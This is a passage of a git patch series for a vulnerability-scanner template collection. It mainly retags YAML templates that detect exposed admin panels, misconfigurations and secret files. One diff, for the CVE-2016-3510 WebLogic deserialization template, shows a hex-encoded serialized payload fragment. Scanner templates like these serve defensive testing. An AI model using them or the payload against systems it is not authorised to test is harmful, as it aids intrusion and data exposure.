a/http/misconfiguration/springboot/springboot-threaddump.yaml b/http/misconfiguration/springboot/springboot-threaddump.yaml index edf5e05d68..9aa50b237d 100644 --- a/http/misconfiguration/springboot/springboot-threaddump.yaml +++ b/http/misconfiguration/springboot/springboot-threaddump.yaml @@ -7,7 +7,7 @@ info: description: The threaddump endpoint provides a thread dump from the application's JVM. reference: - https://docs.spring.io/spring-boot/docs/2.4.11-SNAPSHOT/actuator-api/htmlsingle/#threaddump - tags: springboot + tags: springboot,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/struts-ognl-console.yaml b/http/misconfiguration/struts-ognl-console.yaml index a781359707..56d225cb00 100644 --- a/http/misconfiguration/struts-ognl-console.yaml +++ b/http/misconfiguration/struts-ognl-console.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: html:"Struts Problem Report" - tags: apache,struts,ognl,panel + tags: apache,struts,ognl,panel,misconfig http: - method: GET diff --git a/http/misconfiguration/symfony-debug.yaml b/http/misconfiguration/symfony-debug.yaml index 2f1c005aef..ace1faa0ee 100644 --- a/http/misconfiguration/symfony-debug.yaml +++ b/http/misconfiguration/symfony-debug.yaml @@ -11,7 +11,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"symfony Profiler" - tags: symfony,debug + tags: symfony,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/tcpconfig.yaml b/http/misconfiguration/tcpconfig.yaml index c41cc15943..5af9d3a662 100644 --- a/http/misconfiguration/tcpconfig.yaml +++ b/http/misconfiguration/tcpconfig.yaml @@ -12,7 +12,7 @@ info: reference: - https://www.rockwellautomation.com/ - https://www.exploit-db.com/ghdb/6782 - tags: config,edb,logs + tags: config,edb,logs,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/unauthenticated-alert-manager.yaml b/http/misconfiguration/unauthenticated-alert-manager.yaml index 704bad7e23..1b29734b79 100644 --- a/http/misconfiguration/unauthenticated-alert-manager.yaml +++ b/http/misconfiguration/unauthenticated-alert-manager.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Alertmanager" - tags: unauth,alertmanager + tags: unauth,alertmanager,misconfig http: - method: GET diff --git a/http/misconfiguration/unauthenticated-glances.yaml b/http/misconfiguration/unauthenticated-glances.yaml index 3290b2619d..0cf9cc859e 100644 --- a/http/misconfiguration/unauthenticated-glances.yaml +++ b/http/misconfiguration/unauthenticated-glances.yaml @@ -7,7 +7,7 @@ info: description: Glance running web server mode & Unauthenticated leads system monitoring to info disclosure reference: - https://glances.readthedocs.io/en/latest/quickstart.html#how-to-protect-your-server-or-web-server-with-a-login-password - tags: exposure,glances + tags: exposure,glances,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/unauthenticated-lansweeper.yaml b/http/misconfiguration/unauthenticated-lansweeper.yaml index 8d0d1c6dbb..89756ffe85 100644 --- a/http/misconfiguration/unauthenticated-lansweeper.yaml +++ b/http/misconfiguration/unauthenticated-lansweeper.yaml @@ -4,7 +4,7 @@ info: name: Unauthenticated Lansweeper Instance author: divya_mudgal severity: high - tags: lansweeper,unauth + tags: lansweeper,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/unauthenticated-mongo-express.yaml b/http/misconfiguration/unauthenticated-mongo-express.yaml index 21cb165845..f85ddbfd7b 100644 --- a/http/misconfiguration/unauthenticated-mongo-express.yaml +++ b/http/misconfiguration/unauthenticated-mongo-express.yaml @@ -11,7 +11,7 @@ info: max-request: 3 verified: true shodan-query: title:"Home - Mongo Express" - tags: mongo,unauth,edb + tags: mongo,unauth,edb,misconfig http: - method: GET diff --git a/http/misconfiguration/unauthenticated-nacos-access.yaml b/http/misconfiguration/unauthenticated-nacos-access.yaml index 5cfeb84602..c470f5e23a 100644 --- a/http/misconfiguration/unauthenticated-nacos-access.yaml +++ b/http/misconfiguration/unauthenticated-nacos-access.yaml @@ -8,7 +8,7 @@ info: reference: - https://github.com/alibaba/nacos/issues/4593 - https://nacos.io/en-us/docs/auth.html - tags: nacos,unauth + tags: nacos,unauth,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/unauthenticated-popup-upload.yaml b/http/misconfiguration/unauthenticated-popup-upload.yaml index 09bbfbcba8..8776e52a41 100644 --- a/http/misconfiguration/unauthenticated-popup-upload.yaml +++ b/http/misconfiguration/unauthenticated-popup-upload.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: edb,fileupload + tags: edb,fileupload,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/unauthenticated-prtg.yaml b/http/misconfiguration/unauthenticated-prtg.yaml index 4f5da750f7..f9aed34e22 100644 --- a/http/misconfiguration/unauthenticated-prtg.yaml +++ b/http/misconfiguration/unauthenticated-prtg.yaml @@ -7,7 +7,7 @@ info: description: PRTG Traffic Grapher was able to be accessed with no authentication requirements in place. reference: - https://www.exploit-db.com/ghdb/5808 - tags: config,unauth,prtg,edb + tags: config,unauth,prtg,edb,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/unauthenticated-tensorboard.yaml b/http/misconfiguration/unauthenticated-tensorboard.yaml index 479c6c0988..2d0eb7851f 100644 --- a/http/misconfiguration/unauthenticated-tensorboard.yaml +++ b/http/misconfiguration/unauthenticated-tensorboard.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDk description: Tensorflow Tensorboard was able to be accessed with no authentication requirements in place. severity: high - tags: tensorflow,tensorboard,unauth + tags: tensorflow,tensorboard,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/unauthenticated-zipkin.yaml b/http/misconfiguration/unauthenticated-zipkin.yaml index a4a45f6be1..1a7897fc1f 100644 --- a/http/misconfiguration/unauthenticated-zipkin.yaml +++ b/http/misconfiguration/unauthenticated-zipkin.yaml @@ -7,7 +7,7 @@ info: description: Unauthenticated access to Zipkin was discovered. reference: - https://zipkin.io/ - tags: unauth + tags: unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/unauthorized-h3csecparh-login.yaml b/http/misconfiguration/unauthorized-h3csecparh-login.yaml index 822509cdea..b49f3d1ebe 100644 --- a/http/misconfiguration/unauthorized-h3csecparh-login.yaml +++ b/http/misconfiguration/unauthorized-h3csecparh-login.yaml @@ -10,7 +10,7 @@ info: verified: true shodan-query: http.html:"H3C-SecPath-运维审计系统" fofa-query: app="H3C-SecPath-运维审计系统" && body="2018" - tags: h3c,default-login,unauth + tags: h3c,default-login,unauth,misconfig http: - method: GET diff --git a/http/misconfiguration/unauthorized-plastic-scm.yaml b/http/misconfiguration/unauthorized-plastic-scm.yaml index b044822315..1fcfe1e4da 100644 --- a/http/misconfiguration/unauthorized-plastic-scm.yaml +++ b/http/misconfiguration/unauthorized-plastic-scm.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-288 - tags: plastic + tags: plastic,misconfig metadata: max-request: 3 diff --git a/http/misconfiguration/ups-status.yaml b/http/misconfiguration/ups-status.yaml index f00408dfce..a1a81dc6a2 100644 --- a/http/misconfiguration/ups-status.yaml +++ b/http/misconfiguration/ups-status.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: logs,status,edb + tags: logs,status,edb,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/viewpoint-system-status.yaml b/http/misconfiguration/viewpoint-system-status.yaml index 1e94cade71..6227b9ac40 100644 --- a/http/misconfiguration/viewpoint-system-status.yaml +++ b/http/misconfiguration/viewpoint-system-status.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"ViewPoint System Status" - tags: status,exposure,viewpoint + tags: status,exposure,viewpoint,misconfig http: - method: GET diff --git a/http/misconfiguration/wamp-server-configuration.yaml b/http/misconfiguration/wamp-server-configuration.yaml index 5344adda83..151267a9ab 100644 --- a/http/misconfiguration/wamp-server-configuration.yaml +++ b/http/misconfiguration/wamp-server-configuration.yaml @@ -6,7 +6,7 @@ info: severity: medium description: Wamp default page will expose sensitive configuration and vhosts. reference: https://www.exploit-db.com/ghdb/6891. - tags: wamp,exposure + tags: wamp,exposure,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/wamp-xdebug-detect.yaml b/http/misconfiguration/wamp-xdebug-detect.yaml index a57048e33e..05df08dd31 100644 --- a/http/misconfiguration/wamp-xdebug-detect.yaml +++ b/http/misconfiguration/wamp-xdebug-detect.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: debug,config,wamp + tags: debug,config,wamp,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/webalizer-statistics.yaml b/http/misconfiguration/webalizer-statistics.yaml index 15b62d0d41..6d94f35ff3 100644 --- a/http/misconfiguration/webalizer-statistics.yaml +++ b/http/misconfiguration/webalizer-statistics.yaml @@ -14,7 +14,7 @@ info: max-request: 2 verified: true shodan-query: html:"Generated by The Webalizer" - tags: webalizer,logs,statistics,tenable + tags: webalizer,logs,statistics,tenable,misconfig http: - method: GET diff --git a/http/misconfiguration/wildcard-postmessage.yaml b/http/misconfiguration/wildcard-postmessage.yaml index 74429ca60d..8d4466a282 100644 --- a/http/misconfiguration/wildcard-postmessage.yaml +++ b/http/misconfiguration/wildcard-postmessage.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,postmessage + tags: xss,postmessage,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/zabbix-dashboards-access.yaml b/http/misconfiguration/zabbix-dashboards-access.yaml index 074602a626..7975baba22 100644 --- a/http/misconfiguration/zabbix-dashboards-access.yaml +++ b/http/misconfiguration/zabbix-dashboards-access.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cwe-id: CWE-522 - tags: edb,packetstorm,zabbix,unauth + tags: edb,packetstorm,zabbix,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/zhiyuan-oa-unauthorized.yaml b/http/misconfiguration/zhiyuan-oa-unauthorized.yaml index d232113aee..6e7c96ef8e 100644 --- a/http/misconfiguration/zhiyuan-oa-unauthorized.yaml +++ b/http/misconfiguration/zhiyuan-oa-unauthorized.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://buaq.net/go-53721.html - tags: seeyon,unauth,zhiyuan + tags: seeyon,unauth,zhiyuan,misconfig metadata: max-request: 1 From 22846c7d1b236e637aad2dda9339bf963f1e2239 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 2 Jun 2023 16:21:11 -0700 Subject: [PATCH 134/609] add tech tag to templates in http/tecnologies --- http/technologies/sitecore-cms.yaml | 2 +- http/technologies/tornado-server-login.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/technologies/sitecore-cms.yaml b/http/technologies/sitecore-cms.yaml index cfd32cfda1..d028912e71 100644 --- a/http/technologies/sitecore-cms.yaml +++ b/http/technologies/sitecore-cms.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: title:"sitecore" - tags: cms,sitecore + tags: cms,sitecore,tech http: - method: GET diff --git a/http/technologies/tornado-server-login.yaml b/http/technologies/tornado-server-login.yaml index 032348f3bb..b980e316cb 100644 --- a/http/technologies/tornado-server-login.yaml +++ b/http/technologies/tornado-server-login.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Tornado - Login" - tags: panel,tornado + tags: panel,tornado,tech http: - method: GET From 58c473547dc14321b0f45cbacad48007150a76c1 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 2 Jun 2023 16:21:30 -0700 Subject: [PATCH 135/609] add network tag to templates in network/ --- network/cves/2016/CVE-2016-3510.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index d4f453bc75..bfe1897ded 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -11,7 +11,8 @@ info: metadata: max-request: 1 verified: true - tags: cve,cve2016,weblogic,t3,rce,oast,deserialization + tags: cve,cve2016,weblogic,t3,rce,oast,deserialization,network + verified: "true" variables: start: "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000" From cd3bd124f97b893de42250c63aa0f07b61559c15 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 2 Jun 2023 16:24:47 -0700 Subject: [PATCH 136/609] remove exposure and misconfig tag from exposed panels --- http/exposed-panels/adiscon-loganalyzer.yaml | 2 +- http/exposed-panels/ambari-exposure.yaml | 2 +- http/exposed-panels/avtech-dvr-exposure.yaml | 2 +- http/exposed-panels/dplus-dashboard.yaml | 2 +- http/exposed-panels/gnu-mailman.yaml | 2 +- http/exposed-panels/hydra-dashboard.yaml | 2 +- http/exposed-panels/hypertest-dashboard.yaml | 2 +- http/exposed-panels/jupyter-notebook.yaml | 2 +- http/exposed-panels/kubernetes-web-view.yaml | 2 +- http/exposed-panels/kubeview-dashboard.yaml | 2 +- http/exposed-panels/linkerd-panel.yaml | 2 +- http/exposed-panels/logitech-harmony-portal.yaml | 2 +- http/exposed-panels/magento-downloader-panel.yaml | 2 +- http/exposed-panels/microfocus-admin-server.yaml | 2 +- http/exposed-panels/monitorix-exposure.yaml | 2 +- http/exposed-panels/neo4j-browser.yaml | 2 +- http/exposed-panels/nginx-ui-dashboard.yaml | 2 +- http/exposed-panels/nsq-admin-panel.yaml | 2 +- http/exposed-panels/parse-dashboard.yaml | 2 +- http/exposed-panels/puppetboard-panel.yaml | 2 +- http/exposed-panels/smartping-dashboard.yaml | 2 +- http/exposed-panels/tekton-dashboard.yaml | 2 +- http/exposed-panels/temenos-t24-login.yaml | 2 +- http/exposed-panels/wiren-board-webui.yaml | 2 +- http/exposed-panels/yarn-manager-exposure.yaml | 2 +- 25 files changed, 25 insertions(+), 25 deletions(-) diff --git a/http/exposed-panels/adiscon-loganalyzer.yaml b/http/exposed-panels/adiscon-loganalyzer.yaml index d0fcf770ca..2b5e18d281 100644 --- a/http/exposed-panels/adiscon-loganalyzer.yaml +++ b/http/exposed-panels/adiscon-loganalyzer.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 reference: - https://loganalyzer.adiscon.com/ - tags: adiscon,loganalyzer,syslog,exposure,panel + tags: adiscon,loganalyzer,syslog,panel metadata: max-request: 1 diff --git a/http/exposed-panels/ambari-exposure.yaml b/http/exposed-panels/ambari-exposure.yaml index e116a2bcf4..62eaa8f8f5 100644 --- a/http/exposed-panels/ambari-exposure.yaml +++ b/http/exposed-panels/ambari-exposure.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-668 - tags: panel,apache,ambari,exposure + tags: panel,apache,ambari metadata: max-request: 1 diff --git a/http/exposed-panels/avtech-dvr-exposure.yaml b/http/exposed-panels/avtech-dvr-exposure.yaml index 7518cbd5aa..939d01c109 100644 --- a/http/exposed-panels/avtech-dvr-exposure.yaml +++ b/http/exposed-panels/avtech-dvr-exposure.yaml @@ -7,7 +7,7 @@ info: description: AVTECH AVC798HA DVR is susceptible to information exposure. CGI scripts in the /cgi-bin/nobody directory can be accessed without authentication. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - http://www.avtech.com.tw/ - tags: dvr,exposure,avtech,panel + tags: dvr,avtech,panel metadata: max-request: 1 diff --git a/http/exposed-panels/dplus-dashboard.yaml b/http/exposed-panels/dplus-dashboard.yaml index 1d9fc1689e..0d265f32e7 100644 --- a/http/exposed-panels/dplus-dashboard.yaml +++ b/http/exposed-panels/dplus-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"DPLUS Dashboard" - tags: panel,dplus,exposure + tags: panel,dplus http: - method: GET diff --git a/http/exposed-panels/gnu-mailman.yaml b/http/exposed-panels/gnu-mailman.yaml index 4e8ea7eb24..21d5441c52 100644 --- a/http/exposed-panels/gnu-mailman.yaml +++ b/http/exposed-panels/gnu-mailman.yaml @@ -14,7 +14,7 @@ info: max-request: 2 verified: true shodan-query: title:"Mailing Lists" - tags: exposure,mailman + tags: mailman http: - method: GET diff --git a/http/exposed-panels/hydra-dashboard.yaml b/http/exposed-panels/hydra-dashboard.yaml index 3a9bdf8fdc..667babdda3 100644 --- a/http/exposed-panels/hydra-dashboard.yaml +++ b/http/exposed-panels/hydra-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Hydra Router Dashboard" - tags: panel,exposure,hydra + tags: panel,hydra http: - method: GET diff --git a/http/exposed-panels/hypertest-dashboard.yaml b/http/exposed-panels/hypertest-dashboard.yaml index 4bbf382e80..23fc103fe5 100644 --- a/http/exposed-panels/hypertest-dashboard.yaml +++ b/http/exposed-panels/hypertest-dashboard.yaml @@ -16,7 +16,7 @@ info: max-request: 1 verified: true shodan-query: title:"HyperTest" - tags: panel,exposure,hypertest + tags: panel,hypertest http: - method: GET diff --git a/http/exposed-panels/jupyter-notebook.yaml b/http/exposed-panels/jupyter-notebook.yaml index 99d7adb257..73a81b3b9f 100644 --- a/http/exposed-panels/jupyter-notebook.yaml +++ b/http/exposed-panels/jupyter-notebook.yaml @@ -15,7 +15,7 @@ info: metadata: max-request: 4 shodan-query: http.html:"JupyterHub" - tags: edb,panel,jupyter,notebook,exposure + tags: edb,panel,jupyter,notebook http: - method: GET diff --git a/http/exposed-panels/kubernetes-web-view.yaml b/http/exposed-panels/kubernetes-web-view.yaml index 9bcea113ab..0eae7bd4a1 100644 --- a/http/exposed-panels/kubernetes-web-view.yaml +++ b/http/exposed-panels/kubernetes-web-view.yaml @@ -13,7 +13,7 @@ info: max-request: 2 verified: true shodan-query: title:"Kubernetes Web View" - tags: panel,misconfig,kubernetes,k8s + tags: panel,kubernetes,k8s http: - method: GET diff --git a/http/exposed-panels/kubeview-dashboard.yaml b/http/exposed-panels/kubeview-dashboard.yaml index 8b840e2a24..455930745a 100644 --- a/http/exposed-panels/kubeview-dashboard.yaml +++ b/http/exposed-panels/kubeview-dashboard.yaml @@ -14,7 +14,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-379154636 - tags: exposure,k8s,kubernetes,kubeview,dashboard,panel + tags: k8s,kubernetes,kubeview,dashboard,panel http: - method: GET diff --git a/http/exposed-panels/linkerd-panel.yaml b/http/exposed-panels/linkerd-panel.yaml index 7b78afdd49..00dce4c0a5 100644 --- a/http/exposed-panels/linkerd-panel.yaml +++ b/http/exposed-panels/linkerd-panel.yaml @@ -14,7 +14,7 @@ info: max-request: 1 verified: true shodan-query: html:"data-controller-namespace" - tags: panel,misconfig,linkerd,exposure + tags: panel,linkerd http: - method: GET diff --git a/http/exposed-panels/logitech-harmony-portal.yaml b/http/exposed-panels/logitech-harmony-portal.yaml index 9c9a99f4e7..2695f91cb4 100644 --- a/http/exposed-panels/logitech-harmony-portal.yaml +++ b/http/exposed-panels/logitech-harmony-portal.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Logitech Harmony Pro Installer" - tags: panel,logitech,harmony,exposure + tags: panel,logitech,harmony http: - method: GET diff --git a/http/exposed-panels/magento-downloader-panel.yaml b/http/exposed-panels/magento-downloader-panel.yaml index d184747246..4c44955b02 100644 --- a/http/exposed-panels/magento-downloader-panel.yaml +++ b/http/exposed-panels/magento-downloader-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.component:"Magento" - tags: magento,exposure + tags: magento http: - method: GET diff --git a/http/exposed-panels/microfocus-admin-server.yaml b/http/exposed-panels/microfocus-admin-server.yaml index a8fd3a1c33..995440f6e4 100644 --- a/http/exposed-panels/microfocus-admin-server.yaml +++ b/http/exposed-panels/microfocus-admin-server.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: "Micro Focus DSD" - tags: panel,exposure,microfocus,admin + tags: panel,microfocus,admin http: - method: GET diff --git a/http/exposed-panels/monitorix-exposure.yaml b/http/exposed-panels/monitorix-exposure.yaml index 0fb8823aa4..8074bb5c1a 100644 --- a/http/exposed-panels/monitorix-exposure.yaml +++ b/http/exposed-panels/monitorix-exposure.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: monitorix,exposure,logs,panel + tags: monitorix,logs,panel metadata: max-request: 1 diff --git a/http/exposed-panels/neo4j-browser.yaml b/http/exposed-panels/neo4j-browser.yaml index 043f021cbc..e009b0b535 100644 --- a/http/exposed-panels/neo4j-browser.yaml +++ b/http/exposed-panels/neo4j-browser.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Neo4j Browser" - tags: neo4j,exposure,unauth,panel + tags: neo4j,unauth,panel http: - method: GET diff --git a/http/exposed-panels/nginx-ui-dashboard.yaml b/http/exposed-panels/nginx-ui-dashboard.yaml index cc34e4f007..25d62862a7 100644 --- a/http/exposed-panels/nginx-ui-dashboard.yaml +++ b/http/exposed-panels/nginx-ui-dashboard.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"nginx ui" - tags: panel,nginx,exposure + tags: panel,nginx http: - method: GET diff --git a/http/exposed-panels/nsq-admin-panel.yaml b/http/exposed-panels/nsq-admin-panel.yaml index 463a1349f5..01b2e18701 100644 --- a/http/exposed-panels/nsq-admin-panel.yaml +++ b/http/exposed-panels/nsq-admin-panel.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: title:"nsqadmin" - tags: nsq,admin,panel,exposure + tags: nsq,admin,panel http: - method: GET diff --git a/http/exposed-panels/parse-dashboard.yaml b/http/exposed-panels/parse-dashboard.yaml index 6f49b3d237..872d39afbd 100644 --- a/http/exposed-panels/parse-dashboard.yaml +++ b/http/exposed-panels/parse-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Parse Dashboard" - tags: panel,parse,exposure + tags: panel,parse http: - method: GET diff --git a/http/exposed-panels/puppetboard-panel.yaml b/http/exposed-panels/puppetboard-panel.yaml index 3b114c4974..fc518a947c 100644 --- a/http/exposed-panels/puppetboard-panel.yaml +++ b/http/exposed-panels/puppetboard-panel.yaml @@ -14,7 +14,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Puppetboard" - tags: panel,puppet,exposure + tags: panel,puppet http: - method: GET diff --git a/http/exposed-panels/smartping-dashboard.yaml b/http/exposed-panels/smartping-dashboard.yaml index a21dfd1b3b..8b0407d776 100644 --- a/http/exposed-panels/smartping-dashboard.yaml +++ b/http/exposed-panels/smartping-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"SmartPing Dashboard" - tags: panel,misconfig,unauth,smartping + tags: panel,unauth,smartping http: - method: GET diff --git a/http/exposed-panels/tekton-dashboard.yaml b/http/exposed-panels/tekton-dashboard.yaml index de2323dc29..2b173c0dc8 100644 --- a/http/exposed-panels/tekton-dashboard.yaml +++ b/http/exposed-panels/tekton-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Tekton" - tags: panel,tekton,exposure + tags: panel,tekton http: - method: GET diff --git a/http/exposed-panels/temenos-t24-login.yaml b/http/exposed-panels/temenos-t24-login.yaml index 91f81269da..4f895bc991 100644 --- a/http/exposed-panels/temenos-t24-login.yaml +++ b/http/exposed-panels/temenos-t24-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"t24 sign in" - tags: panel,exposure,temenos + tags: panel,temenos http: - method: GET diff --git a/http/exposed-panels/wiren-board-webui.yaml b/http/exposed-panels/wiren-board-webui.yaml index 125f729dab..6a927be905 100644 --- a/http/exposed-panels/wiren-board-webui.yaml +++ b/http/exposed-panels/wiren-board-webui.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Wiren Board Web UI" - tags: panel,exposure,wiren + tags: panel,wiren http: - method: GET diff --git a/http/exposed-panels/yarn-manager-exposure.yaml b/http/exposed-panels/yarn-manager-exposure.yaml index 71db69a961..c3411ea755 100644 --- a/http/exposed-panels/yarn-manager-exposure.yaml +++ b/http/exposed-panels/yarn-manager-exposure.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: low description: Apache YARN ResourceManager panel was detected. - tags: panel,apache,yarn,exposure + tags: panel,apache,yarn metadata: max-request: 1 From df937f18b85cfd45c12ddcd22ff21b78f5843593 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 2 Jun 2023 16:26:15 -0700 Subject: [PATCH 137/609] remove misconfig tag from exposures --- http/exposures/files/db-xml-file.yaml | 2 +- http/exposures/files/redmine-settings.yaml | 2 +- http/exposures/files/secrets-file.yaml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/http/exposures/files/db-xml-file.yaml b/http/exposures/files/db-xml-file.yaml index 4ff4a94109..4e260f8dce 100644 --- a/http/exposures/files/db-xml-file.yaml +++ b/http/exposures/files/db-xml-file.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: misconfig,db,files,exposure + tags: db,files,exposure http: - method: GET diff --git a/http/exposures/files/redmine-settings.yaml b/http/exposures/files/redmine-settings.yaml index de32c35036..19a31dc7da 100644 --- a/http/exposures/files/redmine-settings.yaml +++ b/http/exposures/files/redmine-settings.yaml @@ -9,7 +9,7 @@ info: max-request: 3 verified: true google-query: intitle:"index of" "settings.yml" - tags: misconfig,redmine,devops,files,exposure + tags: redmine,devops,files,exposure http: - method: GET diff --git a/http/exposures/files/secrets-file.yaml b/http/exposures/files/secrets-file.yaml index ec995f26e4..e455768a41 100644 --- a/http/exposures/files/secrets-file.yaml +++ b/http/exposures/files/secrets-file.yaml @@ -9,7 +9,7 @@ info: max-request: 4 verified: true google-query: intitle:"index of" "secrets.yml" - tags: misconfig,cloud,devops,files + tags: cloud,devops,files http: - method: GET From 3a815a58a1012203cb392d36bcf480e455f05471 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 2 Jun 2023 16:27:22 -0700 Subject: [PATCH 138/609] remove exposure tag from misconfiguration templates --- http/misconfiguration/ace-admin-dashboard.yaml | 2 +- http/misconfiguration/aem/aem-crx-browser.yaml | 2 +- http/misconfiguration/aem/aem-crx-namespace.yaml | 2 +- http/misconfiguration/aem/aem-crx-search.yaml | 2 +- http/misconfiguration/aem/aem-disk-usage.yaml | 2 +- http/misconfiguration/aem/aem-explorer-nodetypes.yaml | 2 +- http/misconfiguration/aem/aem-external-link-checker.yaml | 2 +- http/misconfiguration/aem/aem-misc-admin.yaml | 2 +- http/misconfiguration/aem/aem-secrets.yaml | 3 ++- http/misconfiguration/aem/aem-security-users.yaml | 2 +- http/misconfiguration/aem/aem-sling-userinfo.yaml | 2 +- http/misconfiguration/ampache-update-exposure.yaml | 2 +- http/misconfiguration/apache-drill-exposure.yaml | 2 +- http/misconfiguration/apache-struts-showcase.yaml | 2 +- http/misconfiguration/apache/kafka-manager-unauth.yaml | 2 +- http/misconfiguration/awstats-listing.yaml | 2 +- http/misconfiguration/blackbox-exporter-metrics.yaml | 2 +- http/misconfiguration/bootstrap-admin-panel-template.yaml | 2 +- http/misconfiguration/cadvisor-exposure.yaml | 2 +- http/misconfiguration/clockwork-dashboard-exposure.yaml | 2 +- http/misconfiguration/cloud-metadata.yaml | 2 +- http/misconfiguration/cobbler-exposed-directory.yaml | 2 +- http/misconfiguration/codemeter-webadmin.yaml | 2 +- http/misconfiguration/codis-dashboard.yaml | 2 +- http/misconfiguration/collectd-exporter-metrics.yaml | 2 +- http/misconfiguration/confluence-dashboard.yaml | 2 +- http/misconfiguration/corebos-htaccess.yaml | 2 +- http/misconfiguration/debug/bottle-debug.yaml | 2 +- http/misconfiguration/debug/flask-werkzeug-debug.yaml | 2 +- http/misconfiguration/dgraph-dashboard-exposure.yaml | 2 +- http/misconfiguration/docmosis-tornado-server.yaml | 2 +- http/misconfiguration/elastic-hd-dashboard.yaml | 2 +- http/misconfiguration/encompass-cm1-homepage.yaml | 2 +- http/misconfiguration/envoy-admin-exposure.yaml | 2 +- http/misconfiguration/espeasy-mega-exposure.yaml | 2 +- http/misconfiguration/esphome-dashboard.yaml | 2 +- http/misconfiguration/everything-listing.yaml | 2 +- 